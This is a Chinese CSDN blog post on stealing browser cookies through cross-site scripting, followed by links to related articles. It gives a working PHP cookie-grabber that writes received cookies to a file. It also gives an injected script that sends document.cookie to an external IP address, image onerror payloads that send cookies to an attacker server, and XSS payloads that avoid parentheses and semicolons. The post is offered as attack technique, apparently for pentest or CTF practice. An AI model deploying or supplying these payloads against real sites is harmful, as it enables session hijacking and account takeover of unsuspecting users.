XSS拿Cookie

最新推荐文章于 2024-08-08 08:08:22 发布
最新推荐文章于 2024-08-08 08:08:22 发布
阅读量925 收藏
点赞数 2
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/84754759
版权

payload:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection#exploit-code-or-poc

XSS/grabber.php

<?php
// How to use it
echo "
<script>new Image().src=\"http://localhost/XSS/grabber.php?c=\"+document.cookie;</script>
";

// Write the cookie in a file
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
fclose($fp);

?>

在这里插入图片描述

或者:
直接在grabber.php里这样写:

<?php
// How to use it
session_start();
echo "
<script>new Image().src=\"http://95.a.b.c:8080/?c=\"+document.cookie;</script>
";

?>

然后访问:http://localhost/grabber.php
Cookie(内容为PHPSESSIONID)发送成功。
在这里插入图片描述

其他Payload:

<img src=x οnerrοr=this.src='http://yourserver/?c='+document.cookie>
<img src=https://github.com/favicon.ico width=0 height=0 οnlοad=this.src='http://yourserver/?'+document.cookie>

不用括号和分号XSS:

<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>

在这里插入图片描述
参考:https://portswigger.net/blog/xss-without-parentheses-and-semi-colons

caiqiiqi
关注
专栏目录
【网络安全】XSSCookie外带攻击姿势及例题详析
等风来
05-19 7225
XSSCookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞,在受害者的浏览器上注入恶意代码,并将受害者的 Cookie 数据上传到攻击者控制的服务器上,然后攻击者就可以使用该 Cookie 来冒充受害者,执行一些恶意操作,例如盗取用户的账户信息、发起钓鱼攻击等。
XSS 盗取 Cookie 实验
m0_63645854的博客
04-01 405
本文主要介绍了XSS盗取Cookie流程
利用XSS来将cookie传送指定文件中
Q1n6
09-23 848
题目可以说是很直白了,为什么突然写这个,还来源于前几天的面试,今年的校招因为一些公司的缩招,可以说是泥潭之争了,当然了,被面试官蹂躏也是自身水平和能力的限制,没有任何怨言。在面试官让我手写xss利用代码的时候,我才发现,因为一直以来的乙方的惯性思维,在漏洞利用和脚本上自己的实践太少了,但是还好,我还有很长很长的时间,可以努力。 在存在XSS漏洞的输入框中输入(IP地址为测试内网地址): d
简单的利用XSS获取用户cookie
shy的博客
10-25 4327
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
PayloadsAllTheThings使用教程
最新发布
gitblog_01005的博客
08-08 631
PayloadsAllTheThings使用教程 PayloadsAllTheThingsA list of useful payloads and bypass for Web Application Security and Pentest/CTF项目地址:https://gitcode.com/gh_mirrors/pa/PayloadsAllTheThings 项目介绍 Payloads...
使用xss来打cookie
weixin_60719780的博客
11-11 1112
在我们的xss平台上,我们就可以收到一条信息,这也就说明了我们成功拿到cookie值,里面包含了cookie值;下来我们就可以使用cookie值进行登录,无需密码验证,到这里是不是感觉很爽。这里我们使用安全等级低的来做,使用xss存储型,只要大家能够绕过安全的等级(后面我会将存储型的三个等级绕过方式整理出来)下来我们重新使用一个浏览器打开我们的dvwa靶机,找到检查,找到cookie,进行修改。2、这里面有许多模块,自己选择所需要的就行,这里我使用的是默认模块。成功用cookie登录。
利用XSS漏洞打cookie
qq_68163788的博客
01-15 1870
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
XSS获取cookie
11-19 183
在你服务器的html目录下创建joke文件夹; 在joke文件夹中创建joke.js 和joke.php joke.js 创建img标签,将它的src属性指向另一个脚本joke.php,这里关键的一点是:将页面的cookie作为参数附加到url后面 joke.js代码如下: var img = document.createElement('img'); img.wi...
XSS实现cookie盗取
一期一会的博客
04-08 1054
XSS实现cookie盗取 在一台win7上搭建xss,另外一台搭建留言板(一个网站),两台虚拟机之间能够ping通,在留言板上留言,管理员回复留言,xss上获取到cookie,利用中国菜刀通过获取的cookie用管理员账号登录。 实验环境: ​ Windows 7 192.168.1.128 (搭建xss) ​ Windows 7 192.168.1.100 (安装小旋风) xss平台搭建好以后,进入管理员账户,复制邀请码,退出登录,利用邀请码重新注册一个test11的账户
XSS获取COOKIE
04-20
XSS获取COOKIE
第二节 XSS盗取cookie-01
09-15
XSS盗取cookie详解 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击手法,通过inject恶意脚本来盗取用户的Cookie信息。下面我们将详细介绍XSS盗取cookie的攻击原理、实施方法和防御策略。 Cookie...
网安入门17-XSS(打Cookie
m0_61499194的博客
02-27 750
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie。接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台。反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie。查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接。实战打Cookie成功。
XSS攻击——cookie
qq_46277212的博客
06-23 1920
cookie概述 cookie是一些数据,存储于用户电脑上的文本文件中。当web服务器向浏览器发送web页面时,在连接关闭后,服务器不会记录用户的信息。cookie的作用就是用于解决“如何记录客户端的用户信息”。 当用户访问web页面时,用户名可以记录在cookie中。 在用户下一次访问该页面时,可以在cookie中读取用户访问记录。 cookie以键值对形式存储。如 username=baixiaomao; 当浏览器从服务器上请求web页面时,属于该页面的cookie会被添加到该请求中。服务器端通过
XSS平台打cookie实战
m0_74989372的博客
05-05 471
xss平台的使用及xss漏洞的利用
简单xss接收cookie平台的搭建以及xsscookie的一些总结
..
01-27 4067
接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码提取码:tdoj 我是将其搭在服务器上,模拟最真实的攻击环境。搭在服务器上需要几个条件,一是得有apache服务,二是得有php环境。 Linux环境搭建:CentOs + Apache + MySQL + PHP - 云+社区 - 腾讯云 下面说一下在搭建过程中踩的坑。 一、在上传的时候直接上传解压好的_Blue...
获取cookie_XSS获取COOKIE
weixin_31467557的博客
01-27 1327
XSS获取COOKIESession(会话) 如果想要知道cookie是做什么的,那么就需要了解一下什么是会话(Session),会话,说白了其实就是用来维持你的一整个访问流程,而在程序中,跟踪会话是很重要的事情,拿某宝举栗子,用户a在浏览的时候,他放入购物车的东西无论什么时间放入的,都是属于同一个会话,不会进入b的购物车中,二者不能够混淆,因为二者属于是不同的会话。HTTP...
xss平台打cookie登录后台(保姆级教程)
orange777
02-25 4197
前言 最新看了一篇hack学习呀【记一次帮助粉丝渗透黑入杀猪盘诈骗的实战】的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下 phpstudy环境复现 找一个xss平台,如 http://xsscom.com/ 随便新建一个项目111,复制下面的代码到存在xss的地方即可 直接找个反射型xss试一下(这里在虚机登录) 这里xss平台获取到用户登录情况 用这个获取到的cookie登录一下后台(在物理机试下) 这里说一下,为了方便可以下载一个修改cookie的插件,如google浏览器的EditT
一个自动将cookie发送到自己网站的XSS脚本!
jimmyleeee的专栏
08-02 917
{\"country\":\"USvar u='http://www.mysite.com:8080/m.do?m='+window.document.cookie;var h= document.getElementsByTagName('head').item(0);var
通过钉钉网页上的js学习xsscookie
nidongla的博客
05-05 265
  做完了一个项目,然后没啥事做,无意看到了一个钉钉的外部链接:   题外话1:     查看源码,复制其中的代码: try { var search = location.search; if (search && search.length > 1 && search.charAt(0) === '?') { search = search.substr(1); var pairs .
xss反弹cookie
07-29
XSS(跨站脚本)攻击是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来获取用户的敏感信息,如cookie。根据提供的引用内容,可以看出这是一个XSS攻击的示例代码。 引用\[1\]和引用\[2\]是两种不同的XSS...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值